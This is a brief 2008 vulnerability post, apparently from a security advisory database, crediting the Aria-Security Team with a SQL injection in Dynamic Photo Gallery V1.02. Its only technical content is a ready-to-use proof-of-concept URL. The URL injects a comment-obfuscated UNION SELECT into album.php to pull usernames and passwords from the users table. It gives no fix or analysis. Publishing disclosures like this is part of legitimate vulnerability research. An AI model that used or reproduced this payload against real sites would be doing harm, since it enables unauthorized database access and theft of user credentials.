Lucene search

K

SecurityvulnsSECURITYVULNS:DOC:19323

HistoryMar 03, 2008 - 12:00 a.m.

Dynamic photo gallery V1.02 SQL Injection

2008-03-0300:00:00

vulners.com

14

Aria-Security Team
http://Aria-Security.Net

Shoutz: Aura, imm02rtal, NULL, Kinglet And all our staff
Vendor: http://www.phpwebscript.net/dynamicphotogallery/foto-gallery.php
Original Link: http://forum.aria-security.net/showthread.php?p=1521

PoC:
album.php?slideshow=start&albumID=-4214//union//select//0,username,password,3,4,5,6,7,8//from/**/users

Regards
The-0utl4w